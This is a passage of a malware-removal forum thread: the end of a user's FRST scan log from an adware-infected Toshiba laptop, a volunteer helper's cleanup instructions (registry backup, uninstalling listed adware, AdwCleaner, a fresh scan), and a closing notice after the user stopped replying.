2015-07-25 12:02 - 2015-07-25 12:02 - 00092184 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\xGraphic32.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00342040 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\arkGraphic.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00045920 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\jgImage.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00158048 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\libpng.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00285024 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\libjpegturbo.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00014176 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\jgIOStub.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00194912 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\xImage.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00076128 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\MemDefrag.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00235872 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMWlanMacDll.dll
2011-08-22 10:19 - 2011-08-22 10:19 - 11219328 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2015-07-25 12:10 - 2013-12-10 17:01 - 00104728 ____N () C:\PROGRAM FILES\RISING\RAV\CMPB.DLL
2015-07-25 12:10 - 2013-12-10 17:01 - 00069400 ____N () C:\PROGRAM FILES\RISING\RAV\CMPCUsb.dll
2011-11-25 13:48 - 2011-11-25 13:48 - 00079784 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Oexufafono => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3110752661-1710530649-2414096437-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Cucuk\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{004E616C-5715-4AA6-B64F-C8F72F7CB874}] => (Allow) C:\Program Files\TOSHIBA\Wireless LAN Indicator\tosSettings.exe
FirewallRules: [{B89300EE-060D-4C5F-92A8-9DFCA2D96817}] => (Allow) C:\Program Files\TOSHIBA\Wireless LAN Indicator\tosSettings.exe
FirewallRules: [{4D80EB66-F9DC-43A5-B24E-48AD64955945}] => (Allow) C:\Program Files\TOSHIBA\Wireless LAN Indicator\tosSettings.exe
FirewallRules: [{B65324E2-B402-4D84-91B1-6B710A033C3F}] => (Allow) C:\Program Files\TOSHIBA\Wireless LAN Indicator\tosSettings.exe
FirewallRules: [{77025001-6C6F-476B-B8F6-D88EA1C9EBD0}] => (Allow) C:\Program Files\ASP\unins000.exe
FirewallRules: [{F556C665-0C9D-4A69-A0CD-E87C8C12C5AD}] => (Allow) C:\Program Files\ASP\unins000.exe
FirewallRules: [{A0ED1697-3EF7-4081-B6A8-CF3F23FF55F5}] => (Allow) C:\Program Files\ASP\unins000.exe
FirewallRules: [{74BBC9DD-92F6-4321-BBAB-C4486A02CCC2}] => (Allow) C:\Program Files\ASP\unins000.exe
FirewallRules: [{34F6BD4A-37F5-4239-A4BB-0A7F4C1DA03D}] => (Allow) C:\Program Files\TOSHIBA\Utilities\TACSPROP.exe
FirewallRules: [{5C6FF10A-0281-4586-B892-314B3DAAFDB0}] => (Allow) C:\Program Files\TOSHIBA\Utilities\TACSPROP.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-32bit] => (Allow) %systemroot%\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
FirewallRules: [{60219888-A658-48C6-BED9-569FADA3595B}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: PCI Simple Communications Controller
Description: PCI Simple Communications Controller
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (07/26/2015 09:24:23 AM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/26/2015 01:10:09 AM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 11:00:28 PM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 10:00:07 PM) (Source: System Restore) (EventID: 8210) (User: )
Description: An unspecified error occurred during System Restore: (Installed AVG 2015). Additional information: 0x80070005.

Error: (07/25/2015 09:59:23 PM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 08:32:38 PM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 06:40:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: tosindicator.exe, version: 1.0.15.31, time stamp: 0x4d6b4ad7
Faulting module name: KERNELBASE.dll, version: 6.1.7600.16385, time stamp: 0x4a5bdaae
Exception code: 0xe0434f4d
Fault offset: 0x00009617
Faulting process id: 0x%9
Faulting application start time: 0xtosindicator.exe0
Faulting application path: tosindicator.exe1
Faulting module path: tosindicator.exe2
Report Id: tosindicator.exe3

Error: (07/25/2015 06:39:29 PM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 05:16:03 PM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 03:41:39 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.


Details:
AddLegacyDriverFiles: Unable to back up image of binary AVGIDSDriver.

System Error:
The system cannot find the file specified.
.


System errors:
=============
Error: (07/26/2015 02:01:30 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The WindowsMangerProtect Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (07/26/2015 09:27:02 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Update service terminated with the following error:
%%-2147014790

Error: (07/26/2015 09:26:58 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Background Intelligent Transfer Service service terminated with service-specific error %%-2147014790.

Error: (07/26/2015 09:26:58 AM) (Source: Microsoft-Windows-Bits-Client) (EventID: 16392) (User: NT AUTHORITY)
Description: The BITS service failed to start.  Error 2147952506.

Error: (07/26/2015 09:24:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Typewriter High Resolution service failed to start due to the following error:
%%2

Error: (07/26/2015 09:24:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Encyclopaedia Enter service failed to start due to the following error:
%%2

Error: (07/26/2015 09:24:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UfockFuloxo service failed to start due to the following error:
%%2

Error: (07/26/2015 09:24:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Network Support Service Updater service failed to start due to the following error:
%%2

Error: (07/26/2015 09:24:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Font Size Favourites service failed to start due to the following error:
%%2

Error: (07/26/2015 09:24:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Network HTTP Support Service service failed to start due to the following error:
%%2


Microsoft Office:
=========================

==================== Memory info ===========================

Processor: Intel® Core™ i3-2370M CPU @ 2.40GHz
Percentage of memory in use: 71%
Total physical RAM: 1942.36 MB
Available physical RAM: 555.87 MB
Total Virtual: 3884.72 MB
Available Virtual: 2656.53 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:104.33 GB) (Free:72.04 GB) NTFS
Drive d: () (Fixed) (Total:180.66 GB) (Free:166.14 GB) NTFS
Drive e: () (Fixed) (Total:180.66 GB) (Free:79.61 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 4DB0B0F5)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=104.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=180.7 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.7 GB) - (Type=07 NTFS)

==================== End of log ============================

Edited by hamluis, 26 July 2015 - 01:59 PM.
Moved from Win 7 to Malware Removal Logs - Hamluis.



#2 mAL_rEm018

mAL_rEm018

  • Malware Response Team
  • 308 posts
  • OFFLINE
  • Gender:Male
  • Local time:11:09 AM

Posted 27 July 2015 - 03:37 PM

Please note that all instructions given are customised for this computer only; the tools used may cause damage if used on a computer with different infections.

If you think you have similar problems, please post a log in the Malware Removal forum and wait for help.

Failure to post replies within 3 days will result in this thread being closed.


Hello VickyPratama,

My name is mAL_rEm018, but feel free to call me mAL. I'm an undergraduate trainee and as such my posts to you have to first be checked by a Teacher. Because of this, my replies to your posts may be slightly delayed. Please be patient and I'm sure we'll be able to resolve your problems.
 

Please be aware that removing Malware is a potentially hazardous undertaking. I will take care not to knowingly suggest courses of action that might damage your computer. However it is impossible for me to foresee all interactions that may happen between the software on your computer and those we'll use to clear you of infection, and I cannot guarantee the safety of your system. It is possible that we might encounter situations where the only recourse is to re-format and re-install your operating system, or to necessitate you taking your computer to a repair shop.


Because of this, I advise you to back up any personal files and folders before you start.


Cobian Backup
DriveImage XML


To make sure everything goes smoothly, I would like you to observe the following rules:

  • You must have Administrator rights, permissions for this computer.
  • Please reply to this thread.  Do not start another topic.
  • Perform all actions in the order given.
  • If you don't know, stop and ask!
  • DO NOT run any other fix or removal tools unless instructed to do so!
  • Don't attempt to install any new software (other than those I ask you to) until your computer is clean.
  • DO NOT post for help at any other forum.  Applying fixes from multiple help sites can cause problems.
  • I advise you to print the instructions if possible, since your internet connection might not be available during some of the fixes.
  • Absence of symptoms does not mean that everything is clear, therefore stick with this topic until I give you the "all clear".

I am currently reviewing your logs and will return as soon as possible, with additional instructions.
 


Teacher at the Malware Removal University.

Member of UNITE

 

Failure to post replies within 4 days will result in this thread being closed


#3 mAL_rEm018

mAL_rEm018

  • Malware Response Team
  • 308 posts
  • OFFLINE
  • Gender:Male
  • Local time:11:09 AM

Posted 28 July 2015 - 01:37 PM

Hello VickyPratama,

There is a considerable amount of adware on your computer, therefore it might take a while to get rid of everything. Before we proceed any further it is necessary that you back up your registry.

Backup your registry using TCRB

  • Download TCRB from the following link TCRB
  • Open Tweaking.com Registry Backup.
  • Click on the Backup Registry tab and ensure that all options are checked.
  • Press on Backup Now.
  • Wait until the backup is complete and exit the program.

Removing programs in Windows 7


  • Click the Start Menu and select Control Panel.
  • Click Programs, then Programs and Features.
  • Select the following programs:

    Advanced-System Protector
    AnyProtect
    AnySend
    Buzzdock
    CinemaPlus-3.2cV05.07
    CinemaPlus-3.2cV14.07
    GamesDesktop 091.005010022
    globalupdate Helper
    GoHD
    mystartsearch uninstall
    OffersWizard Network System Driver
    Quebles Emoticons
    SavePass 1.1
    shopperz 2.0.0.461
    Software Version Updater
    TrimEdit
    Wajam

  • Select Uninstall.
  • When prompted select Yes.
  • Answer any questions attentively.
  • When the process is finished, please restart your computer.

Note: you can only remove one program at a time.

Next..

Adwcleaner


  • Close all your programs and right-click AdwCleaner.exe and select Run as administrator.
  • Click on Scan.
  • After the scan is over, select Cleaning.
  • Note: All programs will be closed and your computer will be rebooted, therefore I advise you to save any unsaved work.
  • A notepad window will open.  Please copy/paste the contents in your next reply.

I need to see a fresh FRST scan..



  • Right-click on FRST.exe
  • Select Run as administrator.
  • Ensure that Addition.txt is checked.
  • Click on Scan.
  • When the scan is over, two logs will open (FRST.txt and Addition.txt)
  • Post FRST.txt and Addition.txt in your next reply.


-----------------------------------------
In your next reply, I would like to see..

  • Did you have trouble performing any of the steps?
  • Please give me an update on your computer performance.
  • AdwCleaner log.
  • FRST.txt
  • Addition.txt
    Please post everything in the order given.

Edited by mAL_rEm018, 28 July 2015 - 07:08 PM.



#4 Cypher

Cypher

  • Malware Response Team
  • 6 posts
  • OFFLINE
  • Gender:Male
  • Local time:08:09 AM

Posted 31 July 2015 - 03:09 PM

Due to the lack of feedback, this topic is now closed.
In the event you still have problems, please send a Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.
 


Admin/Teacher at Malware Removal University
